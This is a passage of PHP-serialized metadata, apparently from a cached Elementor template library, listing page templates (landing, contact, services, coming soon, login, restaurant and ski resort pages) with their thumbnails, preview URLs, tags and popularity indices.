3\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-01.png\";s:12:\"tmpl_created\";i:1494352136;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:172;s:16:\"popularity_index\";i:600;s:11:\"trend_index\";i:559;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:692;a:14:{s:2:\"id\";i:1571;s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 4\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-04.png\";s:12:\"tmpl_created\";i:1494352138;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:173;s:16:\"popularity_index\";i:573;s:11:\"trend_index\";i:605;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:693;a:14:{s:2:\"id\";i:192;s:5:\"title\";s:28:\"Landing Page &#8211; Webinar\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0015.png\";s:12:\"tmpl_created\";i:1470820734;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-webinar/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:174;s:16:\"popularity_index\";i:122;s:11:\"trend_index\";i:262;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:694;a:14:{s:2:\"id\";i:2141;s:5:\"title\";s:32:\"Contact &#8211; Delivery Company\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-contact.png\";s:12:\"tmpl_created\";i:1499774122;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/contact-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:175;s:16:\"popularity_index\";i:331;s:11:\"trend_index\";i:470;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:695;a:14:{s:2:\"id\";i:137;s:5:\"title\";s:22:\"Contact &#8211; Modern\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0013.png\";s:12:\"tmpl_created\";i:1470829828;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/contact-modern/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:176;s:16:\"popularity_index\";i:52;s:11:\"trend_index\";i:127;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:696;a:14:{s:2:\"id\";i:256;s:5:\"title\";s:26:\"Contact &#8211; Restaurant\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0011.png\";s:12:\"tmpl_created\";i:1470829796;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/contact-restaurant/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:177;s:16:\"popularity_index\";i:132;s:11:\"trend_index\";i:307;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:697;a:14:{s:2:\"id\";i:2150;s:5:\"title\";s:25:\"Contact &#8211; Cake Shop\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-contact.png\";s:12:\"tmpl_created\";i:1499774127;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/contact-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:178;s:16:\"popularity_index\";i:68;s:11:\"trend_index\";i:183;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:698;a:14:{s:2:\"id\";i:223;s:5:\"title\";s:21:\"Contact &#8211; Hotel\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0002.png\";s:12:\"tmpl_created\";i:1470820471;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/contact-hotel/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:179;s:16:\"popularity_index\";i:134;s:11:\"trend_index\";i:185;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:699;a:14:{s:2:\"id\";i:24;s:5:\"title\";s:25:\"Contact &#8211; Corporate\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0012.png\";s:12:\"tmpl_created\";i:1470248619;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/contact-corporate/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:180;s:16:\"popularity_index\";i:12;s:11:\"trend_index\";i:15;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:700;a:14:{s:2:\"id\";i:184;s:5:\"title\";s:23:\"Services &#8211; Moving\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0017.png\";s:12:\"tmpl_created\";i:1470829889;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/services-moving/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:181;s:16:\"popularity_index\";i:23;s:11:\"trend_index\";i:50;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:701;a:14:{s:2:\"id\";i:625;s:5:\"title\";s:31:\"Services &#8211; Cake Shop Menu\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2016/12/cake-shop-menu.jpg\";s:12:\"tmpl_created\";i:1481549196;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/services-cake-shop-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:182;s:16:\"popularity_index\";i:563;s:11:\"trend_index\";i:653;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:702;a:14:{s:2:\"id\";i:187;s:5:\"title\";s:20:\"Services &#8211; Fun\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0001.png\";s:12:\"tmpl_created\";i:1470829892;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/services-fun/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:183;s:16:\"popularity_index\";i:81;s:11:\"trend_index\";i:232;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:703;a:14:{s:2:\"id\";i:238;s:5:\"title\";s:27:\"Services &#8211; Consulting\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0014.png\";s:12:\"tmpl_created\";i:1470829865;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/services-consulting/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:184;s:16:\"popularity_index\";i:21;s:11:\"trend_index\";i:40;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:704;a:14:{s:2:\"id\";i:647;s:5:\"title\";s:33:\"Services &#8211; Coffee Shop Menu\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2016/12/restaurant-menu.jpg\";s:12:\"tmpl_created\";i:1481549320;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/services-coffee-shop-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:185;s:16:\"popularity_index\";i:464;s:11:\"trend_index\";i:607;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:705;a:14:{s:2:\"id\";i:2138;s:5:\"title\";s:33:\"Services &#8211; Delivery Company\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-services.png\";s:12:\"tmpl_created\";i:1499774119;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/services-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:186;s:16:\"popularity_index\";i:392;s:11:\"trend_index\";i:581;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:706;a:14:{s:2:\"id\";i:823;s:5:\"title\";s:19:\"Pricing &#8211; App\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2017/01/pricing-app.jpg\";s:12:\"tmpl_created\";i:1485272966;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/pricing-app-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:187;s:16:\"popularity_index\";i:357;s:11:\"trend_index\";i:498;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:707;a:14:{s:2:\"id\";i:824;s:5:\"title\";s:24:\"Pricing &#8211; Software\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/01/pricing-software.png\";s:12:\"tmpl_created\";i:1485272900;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/pricing-software-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:188;s:16:\"popularity_index\";i:368;s:11:\"trend_index\";i:468;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:708;a:14:{s:2:\"id\";i:825;s:5:\"title\";s:24:\"Product &#8211; Speakers\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/01/product-page.jpg\";s:12:\"tmpl_created\";i:1485272513;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/product-speakers/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:189;s:16:\"popularity_index\";i:388;s:11:\"trend_index\";i:595;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:709;a:14:{s:2:\"id\";i:245;s:5:\"title\";s:21:\"Product &#8211; Clean\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0020.png\";s:12:\"tmpl_created\";i:1470829876;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/product-clean/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:48:\"[\"fast\",\"minimal\",\"minimalistic\",\"seo\",\"simple\"]\";s:10:\"menu_order\";i:190;s:16:\"popularity_index\";i:88;s:11:\"trend_index\";i:132;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:710;a:14:{s:2:\"id\";i:1075;s:5:\"title\";s:19:\"Shop &#8211; Sweets\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2017/03/Sweets.png\";s:12:\"tmpl_created\";i:1488810871;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/shop-sweets/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:154:\"[\"bakery\",\"beverage\",\"business\",\"cafe\",\"candy bar\",\"catering\",\"delivery service\",\"Food\",\"online shop\",\"pastry\",\"Restaurant\",\"store\",\"sweet shop\",\"sweets\"]\";s:10:\"menu_order\";i:191;s:16:\"popularity_index\";i:59;s:11:\"trend_index\";i:104;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:711;a:14:{s:2:\"id\";i:1051;s:5:\"title\";s:24:\"Blog Post &#8211; Launch\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/03/post-cloud.png\";s:12:\"tmpl_created\";i:1488810869;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blog-post-launch/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:210:\"[\"Agency\",\"bootstrap\",\"business\",\"corporate\",\"Landing Page\",\"launch\",\"marketing campaign\",\"marketing landing page\",\"marketing template landing page\",\"product launch\",\"software\",\"Startup\",\"startup landing page\"]\";s:10:\"menu_order\";i:192;s:16:\"popularity_index\";i:17;s:11:\"trend_index\";i:22;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:712;a:14:{s:2:\"id\";i:1245;s:5:\"title\";s:13:\"Coming Soon 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-1.png\";s:12:\"tmpl_created\";i:1491207184;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:193;s:16:\"popularity_index\";i:259;s:11:\"trend_index\";i:286;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:713;a:14:{s:2:\"id\";i:1247;s:5:\"title\";s:13:\"Coming Soon 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-2.png\";s:12:\"tmpl_created\";i:1491207138;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:194;s:16:\"popularity_index\";i:32;s:11:\"trend_index\";i:31;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:714;a:14:{s:2:\"id\";i:1248;s:5:\"title\";s:13:\"Coming Soon 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-3.png\";s:12:\"tmpl_created\";i:1491207050;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:195;s:16:\"popularity_index\";i:389;s:11:\"trend_index\";i:597;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:715;a:14:{s:2:\"id\";i:1249;s:5:\"title\";s:13:\"Coming Soon 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-4.png\";s:12:\"tmpl_created\";i:1491207380;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:196;s:16:\"popularity_index\";i:429;s:11:\"trend_index\";i:500;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:716;a:14:{s:2:\"id\";i:1250;s:5:\"title\";s:13:\"Coming Soon 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-5.png\";s:12:\"tmpl_created\";i:1491207450;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:197;s:16:\"popularity_index\";i:72;s:11:\"trend_index\";i:134;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:717;a:14:{s:2:\"id\";i:1260;s:5:\"title\";s:18:\"Maintenance Mode 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-6.png\";s:12:\"tmpl_created\";i:1491207507;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/maintenance-mode-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"Maintenance mode\"]\";s:10:\"menu_order\";i:198;s:16:\"popularity_index\";i:457;s:11:\"trend_index\";i:432;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:718;a:14:{s:2:\"id\";i:1261;s:5:\"title\";s:18:\"Maintenance Mode 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/04/Coming-Soon-7.png\";s:12:\"tmpl_created\";i:1491207584;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/maintenance-mode-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"Maintenance mode\"]\";s:10:\"menu_order\";i:199;s:16:\"popularity_index\";i:78;s:11:\"trend_index\";i:200;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:719;a:14:{s:2:\"id\";i:1272;s:5:\"title\";s:13:\"Coming Soon 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-8.png\";s:12:\"tmpl_created\";i:1491207674;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:200;s:16:\"popularity_index\";i:289;s:11:\"trend_index\";i:354;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:720;a:14:{s:2:\"id\";i:1279;s:5:\"title\";s:13:\"Coming Soon 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-9.png\";s:12:\"tmpl_created\";i:1491207756;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:201;s:16:\"popularity_index\";i:145;s:11:\"trend_index\";i:206;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:721;a:14:{s:2:\"id\";i:1745;s:5:\"title\";s:14:\"Coming Soon 10\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-002.png\";s:12:\"tmpl_created\";i:1494849745;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/coming-soon-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:202;s:16:\"popularity_index\";i:278;s:11:\"trend_index\";i:297;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:722;a:14:{s:2:\"id\";i:1742;s:5:\"title\";s:12:\"Login Page 1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-003.png\";s:12:\"tmpl_created\";i:1494849744;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:100:\"https://library.elementor.com/login-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:203;s:16:\"popularity_index\";i:420;s:11:\"trend_index\";i:388;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:723;a:14:{s:2:\"id\";i:1748;s:5:\"title\";s:12:\"Login Page 2\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-001.png\";s:12:\"tmpl_created\";i:1494849742;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/login-page-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:204;s:16:\"popularity_index\";i:299;s:11:\"trend_index\";i:363;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:724;a:14:{s:2:\"id\";i:3963;s:5:\"title\";s:32:\"Restaurant Site &#8211; Homepage\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/01/R.HomepageThumb.png\";s:12:\"tmpl_created\";i:1516284821;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/restaurant-site-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";i:205;s:16:\"popularity_index\";i:237;s:11:\"trend_index\";i:298;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:725;a:14:{s:2:\"id\";i:3969;s:5:\"title\";s:28:\"Restaurant Site &#8211; Menu\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/01/R.MenuThumb.png\";s:12:\"tmpl_created\";i:1516284829;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/restaurant-site-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";i:206;s:16:\"popularity_index\";i:390;s:11:\"trend_index\";i:627;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:726;a:14:{s:2:\"id\";i:3966;s:5:\"title\";s:29:\"Restaurant Site &#8211; About\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/01/R.AboutThumb.png.png\";s:12:\"tmpl_created\";i:1516284839;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/restaurant-site-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";i:207;s:16:\"popularity_index\";i:257;s:11:\"trend_index\";i:305;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:727;a:14:{s:2:\"id\";i:3972;s:5:\"title\";s:31:\"Restaurant Site &#8211; Contact\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/01/R.ContactThumb.png\";s:12:\"tmpl_created\";i:1516284847;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/restaurant-site-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";i:208;s:16:\"popularity_index\";i:363;s:11:\"trend_index\";i:464;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:728;a:14:{s:2:\"id\";i:2080;s:5:\"title\";s:27:\"Ski Resort &#8211; Homepage\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-Home-Page.png\";s:12:\"tmpl_created\";i:1508161124;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/ski-resort-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:209;s:16:\"popularity_index\";i:340;s:11:\"trend_index\";i:387;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:729;a:14:{s:2:\"id\";i:2088;s:5:\"title\";s:24:\"Ski Resort &#8211; About\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-About.png\";s:12:\"tmpl_created\";i:1508161129;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/ski-resort-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:210;s:16:\"popularity_index\";i:425;s:11:\"trend_index\";i:513;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:730;a:14:{s:2:\"id\";i:2085;s:5:\"title\";s:27:\"Ski Resort &#8211; 